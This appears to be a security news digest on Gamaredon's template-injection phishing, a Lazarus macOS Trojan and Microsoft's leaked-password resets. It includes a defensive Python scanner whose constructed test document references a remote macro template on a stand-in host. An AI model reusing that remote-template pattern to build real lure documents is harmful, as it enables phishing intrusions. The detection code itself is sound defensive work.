Anomali yesterday published the results of its study into the activities of Gamaredon (also known as "Primitive Bear"), a Russian threat group active against targets in Ukraine. The targets include diplomats, government officials and employees, journalists, law enforcement, military officials and personnel, non-governmental organizations, and the Ministry of Foreign Affairs of Ukraine. The attackers are using spearphishing lure documents that rely on template injection: the document itself carries no macro, but references a remote document template that Word fetches when the file is opened, and that template then executes VBA macros in the background.
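Template injection leaves a recognizable trace in the document package: an OOXML relationship of type `attachedTemplate` whose target points off-host. The scanner below is an added example written for this page, not code from Anomali's report or from the Gamaredon lure documents; the minimal `.docx` packages it inspects are constructed inline (the `198.51.100.7` address is from the documentation range, and the `Normal.dotm` path is a typical local template reference used as the benign case). It scans every `.rels` part rather than assuming the reference lives in `word/_rels/settings.xml.rels`, and it distinguishes a remote template (HTTP(S)/FTP URL, UNC path, or `file://host/...`) from the ordinary local `file:///C:/...` template reference that legitimate documents also mark as `TargetMode="External"`.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# OOXML relationship type Word uses for an attached (.dot/.dotm/.dotx) template.
ATTACHED_TEMPLATE_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
PKG_RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def is_remote_target(target):
    """True when a relationship target points off-host: a network URL scheme,
    a UNC path, or a file:// URL with a host component."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True  # UNC path, e.g. \\host\share\x.dotm
    parsed = urlparse(target)
    if parsed.scheme in ("http", "https", "ftp", "ftps"):
        return True
    # file:///C:/... has an empty netloc (local disk); file://server/share does not.
    return parsed.scheme == "file" and bool(parsed.netloc)


def find_remote_templates(docx_bytes):
    """Return (rels_part, target) pairs for every attachedTemplate relationship
    whose target would make Word fetch the template from another host."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            # Every relationship part ends in .rels; scan all of them rather than
            # assuming the attacker used word/_rels/settings.xml.rels.
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed .rels part is not our concern here
            for rel in root.iter(f"{{{PKG_RELS_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE_TYPE:
                    continue
                external = rel.get("TargetMode", "Internal").lower() == "external"
                target = rel.get("Target", "")
                if external and is_remote_target(target):
                    hits.append((name, target))
    return hits


def build_minimal_docx(settings_rels_xml):
    """Constructed sample: the smallest zip layout the scanner needs, not a full
    Word document. Only the settings relationship part varies between samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "[Content_Types].xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        )
        zf.writestr(
            "word/settings.xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>',
        )
        zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
             f'<Relationships xmlns="{PKG_RELS_NS}">')
RELS_TAIL = "</Relationships>"

# Constructed: template fetched from a remote host (documentation IP range).
MALICIOUS_RELS = (RELS_HEAD
                  + f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_TYPE}" '
                    'Target="http://198.51.100.7/templates/report.dotm" TargetMode="External"/>'
                  + RELS_TAIL)

# Constructed: the usual local Normal.dotm reference, also marked External by Word.
BENIGN_RELS = (RELS_HEAD
               + f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_TYPE}" '
                 'Target="file:///C:/Users/alice/AppData/Roaming/Microsoft/Templates/Normal.dotm" '
                 'TargetMode="External"/>'
               + RELS_TAIL)

MALICIOUS_DOCX = build_minimal_docx(MALICIOUS_RELS)
BENIGN_DOCX = build_minimal_docx(BENIGN_RELS)

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, find_remote_templates(sample))
```

Run against a real file with `find_remote_templates(open(path, "rb").read())`; a non-empty result means the document will reach out to the listed host as soon as it is opened, before any macro prompt appears. The same relationship scan applies to `.docm` and `.dotx` files, since they share the package layout.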
A new Trojan designed for macOS appears to belong to North Korea's Lazarus Group, Naked Security reports. Security researcher Patrick Wardle noted similarities to other Lazarus Group malware, particularly AppleJeus. The new strain is fileless: it can download and execute additional payloads entirely within the infected system's memory. It is distributed from a website posing as a cryptocurrency trading platform. BleepingComputer points out that fileless malware, while common on Windows, is much less common on macOS. The file isn't signed, so macOS will warn the user when they try to open it (although that won't stop everyone). It appears to be first-stage malware: on its own it does nothing beyond collecting system information and contacting a command-and-control server. Its goal is probably stealing cryptocurrency, which is in keeping with Lazarus Group's history of financially motivated attacks.
Microsoft scanned a database of three billion leaked credentials and identified 44 million users who were still using compromised passwords, ZDNet reports. The company has already forced password resets for these accounts.